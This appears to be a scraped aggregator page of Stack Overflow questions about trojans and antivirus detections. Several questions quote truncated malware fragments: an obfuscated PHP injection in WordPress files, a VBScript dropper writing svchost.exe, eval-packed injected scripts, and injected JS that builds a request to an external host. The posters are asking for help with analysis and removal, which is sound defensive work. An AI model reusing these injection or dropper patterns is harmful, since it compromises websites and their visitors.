trojan

after converting batch file to exe Windows Defender shows the file as trojan why? [closed]

限于喜欢 提交于 2020-12-03 18:07:39
问题 Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers. Want to improve this question? Update the question so it's on-topic for Stack Overflow. Closed 5 years ago . Improve this question i wrote a batch script to delete shortcut virus from a usb drive and to display the hidden folder and files. @ECHO OFF TITLE SHORTCUT VIRUS REMOVER ECHO SHORTCUT VIRUS TEMPORARY REMOVER ECHO THIS TOOL IS MADE BY BHARGAB(MAXYSPARK) SET /P DRIVE=ENTER THE DRIVE

after converting batch file to exe Windows Defender shows the file as trojan why? [closed]

蓝咒 提交于 2020-12-03 18:07:22
问题 Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers. Want to improve this question? Update the question so it's on-topic for Stack Overflow. Closed 5 years ago . Improve this question i wrote a batch script to delete shortcut virus from a usb drive and to display the hidden folder and files. @ECHO OFF TITLE SHORTCUT VIRUS REMOVER ECHO SHORTCUT VIRUS TEMPORARY REMOVER ECHO THIS TOOL IS MADE BY BHARGAB(MAXYSPARK) SET /P DRIVE=ENTER THE DRIVE

localhost redirect to other site… trojan?

你。 提交于 2020-01-06 20:10:55
问题 As title, seems there's a trojan on my server When I put a url like localhost/mysite it redirect to the site free-merchants.com and then return to my site... But if I put 127.0.0.1/mysite all work correctly... Then, what is? I scan with avast and malwarebytes and no virus... With HijackThis I can't see any strange thing... File hosts have only row 127.0.0.1 localhost Can be a bug of my webserver that run with Apache/2.2.21 (Win32) PHP/5.4.32 Or what I must scan? 回答1: Use JRT (junkware removal

False positive detection of c# .net program by anti-virus as trojan

时光怂恿深爱的人放手 提交于 2019-12-23 10:29:14
问题 I have developed a windows service using C#.Net which collects data and send to my server using custom APIs on a regular interval basis with the client user's permission. It was working fine until the user installed the anti-virus software (Kaspersky). It, false positively, detected my .exes as PDM:trojan.win32.generic , thrown away into quarantine and removed its service because I am doing web requests using HTTPWebRequest and HTTPWebResponse to push and pull data. As for temporary, I have

Malicious code found in WordPress theme files. What does it do?

只谈情不闲聊 提交于 2019-12-23 06:40:54
问题 I discovered this code inserted at the top of every single PHP file inside of an old, outdated WordPress installation. I want to figure out what this script was doing, but have been unable to decipher the main hidden code. Can someone with experience in these matters decrypt it? Thanks! <?php if (!isset($GLOBALS["anuna"])) { $ua = strtolower($_SERVER["HTTP_USER_AGENT"]); if ((!strstr($ua, "msie")) and (!strstr($ua, "rv:11"))) $GLOBALS["anuna"] = 1; } ?> <?php $nzujvbbqez = 'E{h%x5c%x7825)j

Remove vbscript or deactivate vbscript from html source code

别等时光非礼了梦想. 提交于 2019-12-21 23:34:51
问题 I have few html files on my computer, that I borrowed from a friend, unfortunately all the files are infected, they all have malicious vbscript code inserted into the source. I have 100s of files and can't edit the source for all files. Is there a way I can remove the malicious script and still get the data? Edit: Here is the sample of the code <script language="VBScript"><!-- DropFileName = "svchost.exe" WriteData = "4D5A9000030000000400........................8CB03FA48CB03" Set FSO =

How can i remove an iframe virus from all of php files on my website

倖福魔咒の 提交于 2019-12-12 03:24:46
问题 I have a problem about removing a virus code from my php files. There are more than 1200 php files in my server and every single php file has been infected by a virus. Virus code adding this line to html output here the virus code : <tag5479347351></tag5479347351><script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p

Avast gives error of JS:Injection-A[Trj] on my website

女生的网名这么多〃 提交于 2019-12-08 12:20:32
问题 Today I got a warning from Avast when I wanted to enter to my website: forumhan.com. To understand this you must have Avast on your computer. My website was infected with JS:Injection-A[Trj] — that's why it wasn't showing. And when I look, I found this on my header: <script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://vkza.tora

AVG detected my program as a virus. What's wrong here? [closed]

一笑奈何 提交于 2019-12-07 20:46:45
问题 It's difficult to tell what is being asked here. This question is ambiguous, vague, incomplete, overly broad, or rhetorical and cannot be reasonably answered in its current form. For help clarifying this question so that it can be reopened, visit the help center. Closed 7 years ago . AVG says that the executable compiled from the code below is a high priority "Trojan horse PSW.Agent.AYRW". Is something wrong here, or is this just a false alarm? #include <windows.h> const char g_szClassName[]

What does this bit of javascript do? This was marked by ESET as trojan

送分小仙女□ 提交于 2019-12-05 05:30:25
问题 I received a spam email that contained an attachment with a .js file, and out of curiosity I opened it up in notepad (didn't run it of course). Had to disable ESET temporarily as it was marking this as a trojan. I was wondering what this actually does: autonomousRadio = eval(('transport', 'caste', 'acoustic', 'primitive', 'absurd', 'clip', '\u0074phenomenon'.e()) + 'h' + ('station', '\u0069program(me)'.e()) + 's'); autonomousRadio = autonomousRadio[('barbarian', '\u0041ruin'.e()) + 'ct' + (